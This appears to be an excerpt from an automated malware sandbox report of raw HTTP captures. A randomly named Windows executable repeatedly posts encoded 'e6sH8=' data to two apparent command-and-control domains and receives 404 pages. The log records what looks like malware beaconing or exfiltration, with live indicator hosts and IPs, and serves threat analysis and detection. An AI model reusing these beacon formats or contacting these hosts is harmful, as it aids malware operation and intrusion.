                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                  Jan 11, 2025 01:21:51.981931925 CET218INData Raw: 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e
                                                                  Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.54998498.124.224.17801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:21:54.016699076 CET739OUTPOST /47f1/ HTTP/1.1
                                                                  Host: www.bookingservice.center
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.bookingservice.center
                                                                  Content-Length: 226
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.bookingservice.center/47f1/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Raw: 65 36 73 48 38 3d 4d 4d 66 73 53 74 61 41 77 79 31 44 68 33 44 53 33 56 4b 56 32 4f 67 4e 75 2f 70 6f 50 72 43 73 79 75 53 56 53 75 65 66 45 4c 65 6e 66 61 77 4a 76 37 49 35 48 30 67 67 38 6f 50 35 54 58 78 4b 51 2f 37 79 37 2f 2f 42 4d 66 78 68 47 72 4d 30 44 7a 74 79 72 56 49 4b 6e 6e 59 45 69 41 53 77 2b 4a 4d 52 5a 30 6c 6d 4f 43 64 63 6d 61 45 72 39 46 39 44 4b 30 45 63 64 6f 61 39 68 59 57 4c 78 58 6a 75 7a 2b 73 47 54 6b 53 73 69 54 44 31 4a 34 72 76 68 64 74 70 6b 31 42 4a 77 71 6a 62 57 4a 55 70 50 37 59 69 32 51 63 37 6a 57 56 79 2b 2b 66 56 66 6c 4f 68 58 37 59 79 52 6b 5a 6c 47 4a 32 69 36 2b 2b 79 6c 63 2b 58 6b 4c 54 66 75 50 32 41 39 4c 35 6e 63 33 30 55
                                                                  Data Ascii: e6sH8=MMfsStaAwy1Dh3DS3VKV2OgNu/poPrCsyuSVSuefELenfawJv7I5H0gg8oP5TXxKQ/7y7//BMfxhGrM0DztyrVIKnnYEiASw+JMRZ0lmOCdcmaEr9F9DK0Ecdoa9hYWLxXjuz+sGTkSsiTD1J4rvhdtpk1BJwqjbWJUpP7Yi2Qc7jWVy++fVflOhX7YyRkZlGJ2i6++ylc+XkLTfuP2A9L5nc30U
                                                                  Jan 11, 2025 01:21:54.551496983 CET1236INHTTP/1.1 404 Not Found
                                                                  Content-Type: text/html
                                                                  Server: Microsoft-IIS/10.0
                                                                  X-Powered-By: ASP.NET
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Date: Sat, 11 Jan 2025 00:21:54 GMT
                                                                  Connection: close
                                                                  Content-Length: 1245
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                  Jan 11, 2025 01:21:54.551522017 CET218INData Raw: 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e
                                                                  Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.54998598.124.224.17801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:21:56.563452005 CET1756OUTPOST /47f1/ HTTP/1.1
                                                                  Host: www.bookingservice.center
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.bookingservice.center
                                                                  Content-Length: 1242
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.bookingservice.center/47f1/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Raw: 65 36 73 48 38 3d 4d 4d 66 73 53 74 61 41 77 79 31 44 68 33 44 53 33 56 4b 56 32 4f 67 4e 75 2f 70 6f 50 72 43 73 79 75 53 56 53 75 65 66 45 4c 47 6e 66 76 6b 4a 39 4d 6b 35 41 30 67 67 2f 6f 50 38 54 58 78 74 51 2f 44 4d 37 2f 43 38 4d 64 5a 68 58 35 30 30 54 42 4a 79 78 46 49 4b 6f 48 59 2f 2f 51 53 66 2b 49 38 56 5a 30 31 6d 4f 43 64 63 6d 63 6f 72 30 30 39 44 4d 30 45 66 63 6f 61 70 6c 59 57 76 78 58 37 2b 7a 2b 34 57 54 56 75 73 69 79 7a 31 4c 4b 54 76 70 64 74 72 6e 31 41 4f 77 72 66 36 57 4a 59 66 50 37 38 63 32 58 51 37 6e 78 51 56 74 4d 48 57 4b 32 79 56 56 35 30 6f 52 52 46 39 59 66 6d 52 36 50 61 51 6c 50 6a 38 79 50 58 4a 34 2f 33 52 68 2b 78 6a 55 6d 31 76 42 42 4e 43 41 6a 73 36 44 5a 6d 30 2f 6c 7a 4f 4a 52 33 44 6d 4b 53 7a 39 44 39 5a 63 61 4f 78 54 45 51 6c 30 53 6f 54 62 43 56 7a 32 65 66 4a 6e 67 34 75 45 4e 77 6b 62 78 48 2b 37 33 72 41 31 37 50 62 57 33 56 65 37 78 49 71 48 45 44 55 74 46 47 68 53 30 2b 63 46 4a 43 2f 39 4c 44 72 75 69 43 6e 42 4b 7a 4b 48 4b 36 4d 6a 45 32 65 [TRUNCATED]
                                                                  Data Ascii: e6sH8=MMfsStaAwy1Dh3DS3VKV2OgNu/poPrCsyuSVSuefELGnfvkJ9Mk5A0gg/oP8TXxtQ/DM7/C8MdZhX500TBJyxFIKoHY//QSf+I8VZ01mOCdcmcor009DM0EfcoaplYWvxX7+z+4WTVusiyz1LKTvpdtrn1AOwrf6WJYfP78c2XQ7nxQVtMHWK2yVV50oRRF9YfmR6PaQlPj8yPXJ4/3Rh+xjUm1vBBNCAjs6DZm0/lzOJR3DmKSz9D9ZcaOxTEQl0SoTbCVz2efJng4uENwkbxH+73rA17PbW3Ve7xIqHEDUtFGhS0+cFJC/9LDruiCnBKzKHK6MjE2epC0rhoYOG74r8pl9LhdRjOTTY/9AuI3cCz6oDBIu2vQFBItxzaH/7A1fu1RjkVaiXEslaG6lAzMJ9YV8d2+M1yEagivBtft6aqvBsVIJyCdCssvQ/0KYh/vJn6Vu73Ka1dBX/uVk8e80pEVO++AzMygrznlxV1WcK1a40pJeGBy1/uOP8Xe3WRgpey3k10OE77q62tpn6mRitIYiCxQtnD202JNmuIsUOfa0bjIGOPFFztE2WLgW8MPYdeDQCCpiujqpr7a3/YE/7tXOgAgt0YJQWW6AA4NFwq9ny1tIYlHQwQxBcr/7777nWJdjSVmQGjMhdeaLq/6XQ71qnCqaucSRq5frEYwClK86+wKPOoOh7yBC2xnnGs69YRFiPqYe5hswrVQrNDrzEUi3Vn29RDmIe5eYf6uE3vLPmuK5H8FkCBQo+d2ZxhVH595EQffEy16ARoRg5C7yZT1qq9BdiWiKmKNZti+TcrdTX5PKWIiq62LdzkN6cRsHhb7Ucy7POMg5nvCTNpBHraQ6+hVTH8e1EgIuKI6TJzn/y4ILS6JPK9JxXQjL1dcMbwypNatmZHWIfkl1YKY+ufMzi76ryJR9bBRChJlRH9Naj1gT6fHi3Md7rqKmWBUPxIXU3Txfq3sEt+dkEDo2CMWcR2q6EkAN5ikwD3PDxM [TRUNCATED]
                                                                  Jan 11, 2025 01:21:57.091456890 CET1236INHTTP/1.1 404 Not Found
                                                                  Content-Type: text/html
                                                                  Server: Microsoft-IIS/10.0
                                                                  X-Powered-By: ASP.NET
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Date: Sat, 11 Jan 2025 00:21:56 GMT
                                                                  Connection: close
                                                                  Content-Length: 1245
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                  Jan 11, 2025 01:21:57.091552019 CET218INData Raw: 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e
                                                                  Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.54998698.124.224.17801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:21:59.105154991 CET442OUTGET /47f1/?e6sH8=BO3MRbup7BgeiGzbrkvG8KshvKs5D/C7iISXRLSPWIyfeIsyuuk5G38k05LUc3hMRb3xwauQUaAEJYhYNzVT8CpTp0QkkBq1y4sNZ2ldFAdykoca83krEGIrLt+evp31gA==&rr=BbldmNsp8 HTTP/1.1
                                                                  Host: www.bookingservice.center
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Jan 11, 2025 01:21:59.620143890 CET1236INHTTP/1.1 404 Not Found
                                                                  Content-Type: text/html
                                                                  Server: Microsoft-IIS/10.0
                                                                  X-Powered-By: ASP.NET
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Date: Sat, 11 Jan 2025 00:21:58 GMT
                                                                  Connection: close
                                                                  Content-Length: 1245
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                  Jan 11, 2025 01:21:59.620172024 CET218INData Raw: 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e
                                                                  Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.549989103.21.221.4801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:22:05.016453028 CET722OUTPOST /4iun/ HTTP/1.1
                                                                  Host: www.tempatmudisini06.click
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.tempatmudisini06.click
                                                                  Content-Length: 206
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.tempatmudisini06.click/4iun/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Raw: 65 36 73 48 38 3d 62 54 67 4c 56 73 43 36 5a 34 79 59 54 2b 52 6e 4f 6a 78 4a 50 70 33 77 4a 52 68 42 72 57 37 30 6a 6c 37 47 57 5a 48 6c 79 62 6e 49 45 31 66 68 2b 35 31 49 70 56 79 6a 38 4f 6a 79 44 49 47 56 53 42 79 32 31 79 55 2f 70 44 6e 77 6f 78 73 43 74 52 38 66 68 39 61 78 4b 63 4e 52 65 4a 72 36 6e 64 50 63 74 38 47 56 75 6c 48 54 54 37 64 6c 69 48 4e 6d 2b 30 44 76 62 4d 7a 50 35 46 7a 66 55 6e 65 46 75 2b 59 51 37 4f 51 54 7a 57 79 65 77 55 6f 2f 6c 2b 31 78 6d 30 36 47 62 4d 59 7a 6b 6d 58 72 32 48 63 54 4d 7a 42 4a 39 55 6a 68 7a 6d 61 6a 6f 63 6e 70 6f 75 42 58 49 7a 72 55 36 57 57 53 39 53 49 3d
                                                                  Data Ascii: e6sH8=bTgLVsC6Z4yYT+RnOjxJPp3wJRhBrW70jl7GWZHlybnIE1fh+51IpVyj8OjyDIGVSBy21yU/pDnwoxsCtR8fh9axKcNReJr6ndPct8GVulHTT7dliHNm+0DvbMzP5FzfUneFu+YQ7OQTzWyewUo/l+1xm06GbMYzkmXr2HcTMzBJ9UjhzmajocnpouBXIzrU6WWS9SI=
                                                                  Jan 11, 2025 01:22:05.824450016 CET1033INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Sat, 11 Jan 2025 00:22:05 GMT
                                                                  server: LiteSpeed
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.549990103.21.221.4801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:22:07.563465118 CET742OUTPOST /4iun/ HTTP/1.1
                                                                  Host: www.tempatmudisini06.click
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.tempatmudisini06.click
                                                                  Content-Length: 226
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.tempatmudisini06.click/4iun/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Raw: 65 36 73 48 38 3d 62 54 67 4c 56 73 43 36 5a 34 79 59 51 65 42 6e 4d 45 64 4a 49 4a 33 78 58 68 68 42 69 32 37 77 6a 6b 48 47 57 59 43 34 79 4a 44 49 46 52 50 68 2f 34 31 49 6c 31 79 6a 33 75 6a 33 65 34 47 6b 53 42 2b 2b 31 33 30 2f 70 44 7a 77 6f 78 38 43 75 6d 49 59 67 74 61 4a 48 38 4e 58 51 70 72 36 6e 64 50 63 74 39 69 7a 75 6b 76 54 54 4c 4e 6c 69 6d 4e 6c 32 55 44 6f 4c 63 7a 50 76 31 7a 54 55 6e 66 53 75 37 42 59 37 4e 6f 54 7a 57 43 65 77 46 6f 34 71 2b 31 4e 6f 55 37 4c 63 2f 35 58 71 6e 4b 68 30 6d 59 55 4d 44 4a 73 31 43 53 4c 70 45 53 4c 37 38 4c 52 34 39 4a 67 5a 44 4b 39 67 31 47 69 6a 46 65 75 44 59 74 71 43 32 4b 38 71 50 55 51 4c 68 39 54 34 61 69 42
                                                                  Data Ascii: e6sH8=bTgLVsC6Z4yYQeBnMEdJIJ3xXhhBi27wjkHGWYC4yJDIFRPh/41Il1yj3uj3e4GkSB++130/pDzwox8CumIYgtaJH8NXQpr6ndPct9izukvTTLNlimNl2UDoLczPv1zTUnfSu7BY7NoTzWCewFo4q+1NoU7Lc/5XqnKh0mYUMDJs1CSLpESL78LR49JgZDK9g1GijFeuDYtqC2K8qPUQLh9T4aiB
                                                                  Jan 11, 2025 01:22:08.468142033 CET1033INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Sat, 11 Jan 2025 00:22:08 GMT
                                                                  server: LiteSpeed
